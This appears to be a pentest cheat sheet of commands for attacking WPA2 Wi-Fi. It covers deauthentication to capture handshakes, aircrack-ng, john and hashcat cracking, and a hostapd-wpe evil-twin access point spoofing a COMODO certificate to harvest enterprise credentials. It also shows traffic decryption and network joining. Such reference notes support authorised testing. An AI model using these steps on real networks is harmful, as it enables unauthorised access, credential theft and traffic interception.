Contents
- Capturing WPA2-PSK Handshakes
- Cracking WPA2-PSK Handshakes
- Capturing WPA2-Managed Handshakes
- Cracking WPA2-Managed Handshakes
- Creating Custom Dictionaries
- Decrypting WPA2 Traffic
- Connecting to Wireless Networks
Useful Links
- https://www.wireshark.org/tools/oui-lookup.html
- https://macvendors.com/
Capturing WPA2-PSK Handshakes
Capturing WPA2-PSK Handshakes and/or PMKID
- Kill interfering processes
airmon-ng check kill- You may need to manually start dhcp on eth0 if you need that to work
- Put the wireless adaptor into monitor mode
airmon-ng start wlan0
- Look for common channels
airodump-ng wlan0mon -a --essid-regex="^(Target|target-).+"airodump-ng wlan0mon -a --essid TargetAP -w recon- Note: 5 GHz cards might also require the use of the –band parameter
- Limit to the common channels and look for the most active
airodump-ng wlan0mon -a --essid TargetAP -c 1,6,11 -w recon
- Limit to the most active channel
airodump-ng wlan0mon -a --essid TargetAP -c 11 -w ch11
- Send deauthentication
aireplay-ng wlan0mon -0 3 -a <Target AP MAC> -c <Client MAC>
Cracking WPA2-PSK Handshakes
Cracking Handshakes/PMKID
- Attempt brute-force password guessing attack
aircrack-ng ch11-01.cap -w dictionary4.txt(Select the right network which should have something like WPA (0 handshake, with PMKID) beside it).
- Troubleshooting
Capturing WPA2-Managed Handshakes
- Install hostapd-wpe
apt-get install hostapd-wpe
- Backup everything in
/etc/hostapd-wpe/certs - Edit
cn.cnfandserver.cnfto suit - Delete all client cert files if you’re not using these
- Clean up before running bootstrap
rm *.pem *.der *.csr *.crt *.key *.p12 serial* index.txt*
- Run
./bootstrap(ignore errors) - Change directory to
/etc/hostapd-wpe - Edit
/etc/hostapd-wpe/hostapd-wpe.conf - Run
airmon-ng check kill - Run
hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf -d - Handshakes should log to
/etc/hostapd-wpe/hostapd-wpe.log
Modifications to ca.cnf
(Remove unused lines in the [certificate_authority] section)
[certificate_authority]
countryName = US
organizationName = COMODO CA Limited
commonName = "COMODO CA Limited"
Modifications to server.cnf
(Remove unused lines in the [server] section)
server.cnf
[ policy_match ]
countryName = supplied
stateOrProvinceName = optional
organizationName = supplied
[server]
countryName = AU
stateOrProvinceName = Victoria
localityName = Melbourne
organizationName = "ACME Limited"
organizationalUnitName = IT
commonName = "wireless.acme.internal"
Modifications to hostapd-wpe.conf
ssid=targetap
bssid=c0:ff:ee:c0:ff:ee
channel=36
Cracking WPA2-Managed Handshakes
- Copy the username:hash sections from
/etc/hostapd-wpe/hostapd-wpe.loginto another file and run john or hashcat - john:
cat /etc/hostapd-wpe/hostapd-wpe.log | grep jtr | cut -f 4 | sort -u -t: -k1,1 > /tmp/jtr.txtjohn jtr.txt --wordlist=/usr/share/wordlists/rockyou.txt
- hashcat:
cat /etc/hostapd-wpe/hostapd-wpe.log | grep hashcat | cut -f 3 | sort -u -t: -k1,1 > /tmp/hcat.txthashcat -m 5500 hcat.txt /usr/share/wordlists/rockyou.txt
Creating Custom Dictionaries
- Create
words.txttargetap - Permutate this wordlist with l33tsp34k rules
john --wordlist=words.txt --rules=NT --stdout | sort -u > dictionary1.txtjohn --wordlist=dictionary1.txt --rules=l33t --stdout | sort -u > dictionary2.txtjohn --wordlist=dictionary2.txt --rules=l33t --stdout | sort -u > dictionary3.txtjohn --wordlist=dictionary3.txt --rules=l33t --stdout | sort -u > dictionary4.txt
Decrypting WPA2 Traffic
- Decrypt with
airdecap-ng -e TargetAP -b 18:80:90:6E:E7:A4 -p "APPassword" ch11-05.cap
- Tip: You can leave airodump running to continue capture while you work at decrypting.
- Open with Wireshark
wireshark ch11-05-dec.cap
- Try some basic filters
tcp.port eq 80tcp.port eq 21
Connecting to Wireless Networks
wpa_passphrase "TargetAP" "12345678" > TargetAP.confsudo wpa_supplicant -i wlan0mon -c TargetAP.conf -diwconfig to check status